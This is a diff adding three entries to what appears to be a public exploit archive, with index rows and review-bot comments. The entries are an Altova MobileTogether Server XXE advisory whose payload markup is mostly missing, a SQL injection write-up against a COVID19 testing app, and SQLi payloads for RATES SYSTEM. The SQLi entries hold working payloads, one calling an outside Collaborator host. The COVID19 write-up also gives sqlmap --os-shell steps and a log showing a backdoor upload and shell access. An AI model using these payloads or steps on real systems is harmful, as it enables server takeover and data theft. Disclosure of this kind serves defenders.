diff --git a/exploits/multiple/webapps/50191.txt b/exploits/multiple/webapps/50191.txt
new file mode 100644
index 000000000..18d3cd9b4
--- /dev/null
+++ b/exploits/multiple/webapps/50191.txt
@@ -0,0 +1,344 @@
+# Exploit Title: Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)
+# Date: 2021-08-10
+# Exploit Author: RedTeam Pentesting GmbH
+# Vendor Homepage: https://www.altova.com/mobiletogether-server
+# Version: 7.3
+# CVE: 2021-37425
+
+Advisory: XML External Entity Expansion in MobileTogether Server
+
+RedTeam Pentesting discovered a vulnerability in the MobileTogether
+server which allows users with access to at least one app to read
+arbitrary, non-binary files from the file system and perform server-side
+requests. The vulnerability can also be used to deny availability of the
+system. As an example, this advisory shows the compromise of the
+server's certificate and private key.
+
+
+Details
+=======
+
+Product: MobileTogether Server
+Affected Versions: 7.0-7.3, potentially earlier versions as well
+Fixed Versions: 7.3 SP1
+Vulnerability Type: XML External and Exponential Entity Expansion
+Security Risk: medium
+Vendor URL: https://www.altova.com/mobiletogether-server
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-002
+Advisory Status: published
+CVE: CVE-2021-37425
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37425
+
+
+Introduction
+============
+
+"MobileTogether Server is the processing powerhouse for your native iOS,
+Android, Windows, and browser-based apps.
+
+MobileTogether Server is the back-end hub for your solutions and acts as
+a gateway between end-users and your back-end data sources and
+infrastructure."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+MobileTogether Server is a back-end application hosting developed apps
+and provide access to various platforms and devices. Access to these
+apps is possible via native applications for devices and operating
+systems or directly via the browser. To access the MobileTogether
+server, depending on configuration either an anonymous login is possible
+or credentials are required.
+
+During analysis of the communication between a MobileTogether client
+application on a smartphone and the MobileTogether Server, HTTP requests
+were observed containing JSON as well as XML data. Generally, the XML
+data is used to signal changes in the UI or user-supplied input for the
+app hosted in MobileTogether Server.
+
+It was found that user-supplied XML external entities included in the
+described HTTP requests are resolved by the MobileTogether Server and
+the result is reflected in an HTTP response.
+
+This behaviour allows to read local files, perform server-side requests
+and also deny the availability of the service through XML exponential
+entity expansion. However, file disclosure is limited to non-binary
+files and the absolute path needs to be known in advance.
+
+
+Proof of Concept
+================
+
+MobileTogether Server comes with a series of example applications. To
+exploit the vulnerability, access to at least one application is
+required. In the following, the app EuroFXrates and the default user
+root with the default password root is used for demonstration of the
+vulnerability.
+
+The following HTTP request contains the minimal data required to be
+accepted by the server resulting in the processing of the XML data
+stored within the JSON field InfoSetChanges/Changes (formatted for
+better readability):
+
+------------------------------------------------------------------------
+POST /workflowmanagement HTTP/1.1
+Authorization: Basic cm9vdDpyb290
+Content-Type: application/json
+Content-Length: 851
+Host: 192.168.1.1:8085
+Connection: close
+
+{
+ "DeviceY": 0,
+ "ClientVersionName": "7.2.2",
+ "MobileManufacturer": "",
+ "AllInfosetsSerialized": true,
+ "ServerName": "192.168.1.1",
+ "ProtocolVersionMax": "2",
+ "Language": "en-US",
+ "DeviceType": "",
+ "ClientKey": "1_11148009037086584903_2744738433663963458",
+ "DeviceXDPI": 0,
+ "DeviceYDPI": 0,
+ "DeviceYCanvasWithTabs": 0,
+ "ClientArchiveVersionUUID": "{C022C8D8-8B2B-4D45-BD00-0DB942509EA3}",
+ "ProtocolVersionMin": "2",
+ "DeviceXCanvas": 0,
+ "ClientArchiveVersionMin": "-74",
+ "MobileOSVersion": "Android 11",
+ "DeviceXCanvasWithTabs": 0,
+ "ClientArchiveVersionMax": "65",
+ "User": "root",
+ "DeviceX": 0,
+ "DesignFileName": "/public/EuroFXrates",
+ "EncValue": "M9EBc6-7P5cd0",
+ "DeviceYCanvas": 0,
+ "MobileID": "5b39edd9-2533-4a61-ae66-b906893c5412",
+ "InfosetChanges": [
+ {
+ "Changes": [
+ {
+ "": "
+
+ false
+ "
+ }
+ ],
+ "ID": "$$PERS$$"
+ }
+ ],
+ "DeviceIsPortrait": true
+}
+------------------------------------------------------------------------
+
+With the following XML data it can be verified that XML entities are
+resolved and reflected within predefined XML tags in the HTTP response:
+
+------------------------------------------------------------------------
+
+
+]>
+
+ &redteam;
+
+------------------------------------------------------------------------
+
+The HTTP response contains the resolved XML entity:
+
+------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Content-Type: text/html;charset=utf-8
+Server: CherryPy/18.1.0
+[...]
+
+[...]
+
+
+ RedTeam Pentesting
+[...]
+------------------------------------------------------------------------
+
+The following example shows how local files can be read from the server
+system hosting the MobileTogether Server on a Windows system:
+
+------------------------------------------------------------------------
+
+
+]>
+
+ &redteam;
+
+------------------------------------------------------------------------
+
+The content of the file is shown below and formatted for better
+readability:
+
+------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Content-Type: text/html;charset=utf-8
+Server: CherryPy/18.1.0
+[...]
+
+[...]
+
+
+
+ ; for 16-bit app support
+ [fonts]
+ [extensions]
+ [mci extensions]
+ [files]
+ [Mail]
+ MAPI=1
+
+[...]
+------------------------------------------------------------------------
+
+One interesting target for attackers could be the configuration file for
+the MobileTogether Server residing at the following fixed location:
+
+------------------------------------------------------------------------
+C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg
+------------------------------------------------------------------------
+
+For example, if the server supports HTTPS, the absolute path to the
+server's certificate and private key is stored in its configuration.
+
+Furthermore, external XML entities can be used to access third-party
+websites as well as web services that are only available internally.
+Together with an externally hosted XML DTD, response information can be
+extracted:
+
+------------------------------------------------------------------------
+
+
+
+">
+ % dtd; ]>
+
+ &redteam;
+
+------------------------------------------------------------------------
+
+The DTD contains the following information:
+
+------------------------------------------------------------------------
+
+------------------------------------------------------------------------
+
+In the HTTP response, the HTML markup delivered by internal.example.com
+is now visible.
+
+A further vulnerability attacks the availability of the service through
+XML exponential entity expansion. This is demonstrated with the
+following XML document:
+
+------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+]>
+
+ &redteam20;
+
+------------------------------------------------------------------------
+
+Sending the shown XML document leads to a huge server-side resource
+allocation which ultimately disrupts the availability of the
+MobileTogether Server.
+
+
+Workaround
+==========
+
+None known.
+
+
+Fix
+===
+
+According to the vendor, upgrading to version 7.3 SP1 resolves the
+vulnerability.
+
+
+Security Risk
+=============
+
+Attackers in possession of an account for a MobileTogether Server with
+access to at least one app are able to read files from the server
+system, conduct HTTP requests to external and internal systems and can
+also deny the availability of the service. Access might also be possible
+through default credentials or the anonymous user.
+
+
+Timeline
+========
+
+2021-06-21 Vulnerability identified
+2021-06-23 Requested a security contact from vendor
+2021-06-25 Security contact established with vendor
+2021-07-05 Customer approved disclosure to vendor
+2021-07-05 Vendor notified
+2021-07-20 Vendor acknowledged vulnerability
+2021-07-22 CVE ID requested
+2021-07-23 CVE ID assigned
+2021-07-28 Vendor released fixed version
+2021-08-10 Advisory released
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+
+Working at RedTeam Pentesting
+=============================
+
+RedTeam Pentesting is looking for penetration testers to join our team
+in Aachen, Germany. If you are interested please visit:
+https://www.redteam-pentesting.de/jobs/
+
+--
+RedTeam Pentesting GmbH Tel.: +49 241 510081-0
+Dennewartstr. 25-27 Fax : +49 241 510081-99
+52068 Aachen https://www.redteam-pentesting.de
+Germany Registergericht: Aachen HRB 14004
+Geschäftsführer: Patrick Hof, Jens Liebchen
\ No newline at end of file
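Review bot: the XML blocks in the Proof of Concept section are incomplete as committed. The blocks the text introduces with "With the following XML data" and "The DTD contains the following information" hold only fragments such as `]>` and `&redteam;`, or nothing at all, and the `"Changes"` entry in the JSON body has an empty key (`"": "`). Angle-bracket markup appears to have been lost on import, so the file no longer matches its own prose; re-import the advisory text from the Advisory URL given in the file with markup preserved, or mark the blocks as elided. Separately, the header `# Version: 7.3` is narrower than `Affected Versions: 7.0-7.3` in the body, which will mislead anyone filtering by version, and the file ends without a trailing newline.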
diff --git a/exploits/php/webapps/50190.txt b/exploits/php/webapps/50190.txt
new file mode 100644
index 000000000..c4e0f6754
--- /dev/null
+++ b/exploits/php/webapps/50190.txt
@@ -0,0 +1,45 @@
+# Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection
+# Google Dork: intitle: "COVID19 Testing Management System"
+# Date: 09/08/2021
+# Exploit Author: Ashish Upsham
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
+# Version: v1.0
+# Tested on: Windows
+
+Description:
+
+The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to
+SQL injection via the 'searchdata' parameter on the patient-search-report.php page.
+
+==================== 1. SQLi ====================
+
+http://192.168.0.107:80/covid-tms/patient-search-report.php
+
+The "searchdata" parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
+user has the full ability to run system commands via --os-shell and fully compromise the system
+
+POST parameter 'searchdata' is vulnerable.
+
+step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool.
+step 2 : Now copy the post request and save it as test.txt file.
+step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell"
+
+----------------------------------------------------------------------
+Parameter: searchdata (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 5 columns
+ Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search
+
+[19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method
+[19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B)
+[19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php
+[19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php[19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
+os-shell> whoami
+do you want to retrieve the command standard output? [Y/n/a] y
+command standard output: 'laptop-ashish\ashish'
+os-shell>
\ No newline at end of file
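Review bot: the description's claim that an unauthenticated user can "run system commands via --os-shell" rests on a precondition the write-up never states. The log lines show sqlmap writing `tmpuptfn.php` into `/xampp/htdocs/`, so the result depends on the database account being able to write files into the web root of this XAMPP install. State that precondition next to the claim, so readers assessing their own exposure can separate the SQL injection (the bug) from command execution (a consequence of this deployment). Also, `# Date: 09/08/2021` is ambiguous between day-first and month-first order, the "backdoor has been successfully uploaded" and "calling OS shell" log entries are fused onto one line, and the file ends without a trailing newline.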
diff --git a/exploits/php/webapps/50192.txt b/exploits/php/webapps/50192.txt
new file mode 100644
index 000000000..2251943e8
--- /dev/null
+++ b/exploits/php/webapps/50192.txt
@@ -0,0 +1,80 @@
+# Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections
+# Date: 11-08-2021
+# Exploit Author: Halit AKAYDIN (hLtAkydn)
+# Software Link: https://www.sourcecodester.com/php/14904/rates-system.html
+# Version: V1.0
+# Category: Webapps
+# Tested on: Linux/Windows
+
+# Description:
+# PHP Dashboards is prone to an SQL-injection vulnerability
+# because it fails to sufficiently sanitize user-supplied data before using
+# it in an SQL query.Exploiting this issue could allow an attacker to
+# compromise the application, access or modify data, or exploit latent
+# vulnerabilities in the underlying database.
+
+# Vulnerable Request:
+
+POST /register.php HTTP/1.1
+Host: localhost
+Content-Length: 70
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/register.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf
+Connection: close
+
+ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456®ister=
+
+# Vulnerable Payload:
+# Parameter: ClientId (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=®ister=oQCR
+
+--------------------------------------------------------------------------------------------------------------------------
+
+# Vulnerable Request:
+
+POST /passwordreset.php HTTP/1.1
+Host: localhost
+Content-Length: 61
+Cache-Control: max-age=0
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/passwordreset.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61
+Connection: close
+
+loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset=
+
+# Vulnerable Payload:
+# Parameter: loginId (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX
\ No newline at end of file
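Review bot: the `# Description:` block names the wrong product. It says "PHP Dashboards is prone to an SQL-injection vulnerability" while the title and Software Link are for RATES SYSTEM 1.0, which reads as a template carried over from another entry. Replace the product name and name the affected parameters the file itself reports (`ClientId` on /register.php, `loginId` on /passwordreset.php) instead of the generic wording. The /register.php request body and payload line also contain `®ister=`, presumably `&register=` with the `&reg` sequence decoded as an entity, so the recorded body does not match its `Content-Length: 70`. The date `11-08-2021` would be unambiguous in ISO form, and the file ends without a trailing newline.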
diff --git a/files_exploits.csv b/files_exploits.csv
index c0b2caa95..b623ce069 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44319,3 +44319,6 @@ id,file,description,date,author,type,platform,port
50186,exploits/php/webapps/50186.txt,"WordPress Plugin LifterLMS 4.21.1 - Access Other Student Grades/Answers via IDOR",2021-08-10,Captain_hook,webapps,php,
50187,exploits/php/webapps/50187.txt,"WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS)",2021-08-10,"Aryan Chehreghani",webapps,php,
50189,exploits/php/webapps/50189.txt,"Simple Library Management System 1.0 - 'rollno' SQL Injection",2021-08-10,"Halit AKAYDIN",webapps,php,
+50190,exploits/php/webapps/50190.txt,"COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection",2021-08-12,"Ashish Upsham",webapps,php,
+50191,exploits/multiple/webapps/50191.txt,"Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)",2021-08-12,"RedTeam Pentesting GmbH",webapps,multiple,
+50192,exploits/php/webapps/50192.txt,"RATES SYSTEM 1.0 - 'Multiple' SQL Injections",2021-08-12,"Halit AKAYDIN",webapps,php,
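Review bot: all three added rows carry the date `2021-08-12`, which matches none of the dates in the files themselves (`2021-08-10` in 50191.txt, `09/08/2021` in 50190.txt, `11-08-2021` in 50192.txt). If the column holds the archive's publication date, that convention should be documented next to the header row; otherwise take the date from each file's header. The 50191 description also pins the product to "7.3" although the file lists affected versions 7.0-7.3 and a CVE ID, neither of which the index row captures, which matters to anyone matching this index against an inventory.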